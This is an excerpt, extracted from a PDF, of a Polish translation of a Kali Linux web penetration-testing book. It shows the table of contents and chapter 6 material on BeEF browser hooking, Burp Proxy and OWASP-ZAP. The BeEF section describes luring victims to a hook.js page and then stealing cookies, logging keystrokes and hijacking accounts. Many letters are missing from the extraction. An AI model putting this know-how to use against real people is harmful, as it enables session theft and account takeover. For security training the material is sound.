Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf ·...
Transcript of Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf ·...
Tytuł oryginału Web Penetration Testing with Kali Linux
Tłumaczenie Grzegorz Kowalczyk
ISBN 978-83-246-9013-8
Copyright copy 2013 Packt Publishing
First published in the English language under the title bdquoWeb Penetration Testing with Kali Linuxrdquo
Polish edition copyright copy 2014 by Helion SA All rights reserved
All rights reserved No part of this book may be reproduced or transmitted in any form or by any means electronic or mechanical including photocopying recording or by any information storage retrieval system without permission from the Publisher
Wszelkie prawa zastrzeżone Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione Wykonywanie kopii metodą kserograficzną fotograficzną a także kopiowanie książki na nośniku filmowym magnetycznym lub innym powoduje naruszenie praw autorskich niniejszej publikacji
Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli
Autor oraz Wydawnictwo HELION dołożyli wszelkich starań by zawarte w tej książce informacje były kompletne i rzetelne Nie biorą jednak żadnej odpowiedzialności ani za ich wykorzystanie ani za związane z tym ewentualne naruszenie praw patentowych lub autorskich Autor oraz Wydawnictwo HELION nie ponoszą roacutewnież żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce
Wydawnictwo HELIONul Kościuszki 1c 44-100 GLIWICEtel 32 231 22 19 32 230 98 63e-mail helionhelionplWWW httphelionpl (księgarnia internetowa katalog książek)
Drogi CzytelnikuJeżeli chcesz ocenić tę książkę zajrzyj pod adres httphelionpluseropiniekaliliMożesz tam wpisać swoje uwagi spostrzeżenia recenzję
Printed in Poland
bull Kup książkębull Poleć książkę bull Oceń książkę
bull Księgarnia internetowabull Lubię to raquo Nasza społeczność
Spis tre ci
O autorach 9
O recenzentach 11
Wst p 15
Co znajdziesz w tej ksi ce 16Czego potrzebujesz do pracy z ksi k 17Dla kogo przeznaczona jest ta ksi ka 17Konwencje 18Errata 18Piractwo 19
Rozdzia 1 Przygotowania 21
Podstawowe za o enia testoacutew penetracyjnych aplikacji internetowych 23Metodologia przeprowadzania testoacutew penetracyjnych 24
Ocena ryzyka 30Testy penetracyjne z wykorzystaniem systemu Kali Linux mdash za o enia 34
Etap 1 Rekonesans 34Etap 2 Wyszukiwanie podatno ci 35Etap 3 Wykorzystywanie zidentyfikowanych podatno ci 36Etap 4 Podnoszenie uprawnie 37Etap 5 Utrzymanie zdobytego przyczoacute ka 37
Wprowadzenie do systemu Kali Linux 38Konfiguracja systemu Kali Linux 39
Uruchamianie systemu Kali Linux z no nika zewn trznego 39Instalowanie systemu Kali Linux 40Kali Linux i pierwsze uruchomienie w maszynie wirtualnej 46
Przegl d narz dzi dost pnych w systemie Kali Linux 46Podsumowanie 49
Kup książkę Poleć książkę
Spis tre ci
4
Rozdzia 2 Rekonesans 51
Zadania rekonesansu 52Rozpoznanie wst pne 53
Strona internetowa firmy 53roacuted a przechowuj ce historyczne wersje witryn internetowych 54
Regional Internet Registries czyli regionalni administratorzy adresoacutew IP 57System EDGAR 57Zasoby serwisoacutew spo eczno ciowych 58Zaufanie 59Oferty pracy 59Lokalizacja 60Wyszukiwarka Shodan 60Google hacking 61GHDB czyli Google Hacking Database 63Badanie zasoboacutew sieci komputerowych 65Rekonesans z wykorzystaniem protoko u ICMP 69Rekonesans z wykorzystaniem serweroacutew DNS 71Nmap 76FOCA mdash wyszukiwanie i analiza metadanych 83
Podsumowanie 89
Rozdzia 3 Ataki na serwery aplikacji internetowych 91
Wyszukiwanie podatno ci i luk w zabezpieczeniach 92Webshag 92Skipfish 95ProxyStrike 98Vega 101Owasp-Zap 105Websploit 112
Wykorzystywanie znalezionych luk w zabezpieczeniach (exploity) 113Metasploit 113w3af 120
Wykorzystywanie luk w zabezpieczeniach systemoacutew poczty elektronicznej 123Ataki typu brute-force 125
Hydra 125DirBuster 128WebSlayer 131
amanie hase 137John the Ripper 137
Ataki typu man-in-the-middle 139SSLStrip 140
Podsumowanie 145
Kup książkę Poleć książkę
Spis tre ci
5
Rozdzia 4 Ataki na klienty aplikacji internetowych 147
In ynieria spo eczna 148Pakiet SET mdash Social Engineer Toolkit 149
Zastosowanie pakietu SET do ataku z klonowaniem 151MitM Proxy 161Skanowanie hostoacutew 162
Skanowanie hostoacutew za pomoc pakietu Nessus 162Przechwytywanie i amanie hase u ytkownikoacutew 169
Has a w systemie Windows 171Has a w systemie Linux 173
Narz dzia do amania hase dost pne w systemie Kali Linux 174Johnny 174Programy hashcat i oclHashcat 177samdump2 178chntpw 180Ophcrack 183Crunch 185
Inne narz dzia dost pne w systemie Kali Linux 188Hash-identifier 188dictstat 189RainbowCrack (rcracki_mt) 189findmyhash 190phrasendrescher 190CmosPwd 190creddump 191
Podsumowanie 191
Rozdzia 5 Ataki na metody uwierzytelniania 193
Ataki na zarz dzanie sesjami 195Clickjacking 196
Przechwytywanie ciasteczek sesji 197Narz dzia do przechwytywania sesji 198
Wtyczki przegl darki Firefox 198Cookie Cadger 203Wireshark 206Pakiety Hamster i Ferret 208Atak typu man-in-the-middle 211Narz dzia dsniff i arpspoof 212Ettercap 214Driftnet 217
Wstrzykiwanie kodu SQL 218sqlmap 221
Ataki typu XSS (cross-site scripting) 223Testowanie podatno ci na ataki XSS 224
Techniki XSS cookie stealing i Authentication hijacking 225
Kup książkę Poleć książkę
Spis tre ci
6
Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229
Podsumowanie 229
Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231
BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255
THX-SSL-DOS 257Scapy 259Slowloris 261
LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266
DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270
Podsumowanie 270
Rozdzia 7 Przeciwdzia anie i zapobieganie 271
Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277
Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281
Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284
Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287
Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295
Podsumowanie 300
Kup książkę Poleć książkę
Spis tre ci
7
Rozdzia 8 Tworzenie raportoacutew ko cowych 301
Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307
Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319
Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323
Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327
Podsumowanie 327
Skorowidz 329
Kup książkę Poleć książkę
Spis tre ci
8
Kup książkę Poleć książkę
6
Ataki na aplikacjeinternetowe
i serwery WWW
W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-
ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew
Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
232
systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS
BeEF mdash Browser Exploitation Framework
Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych
Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox
Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux
Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
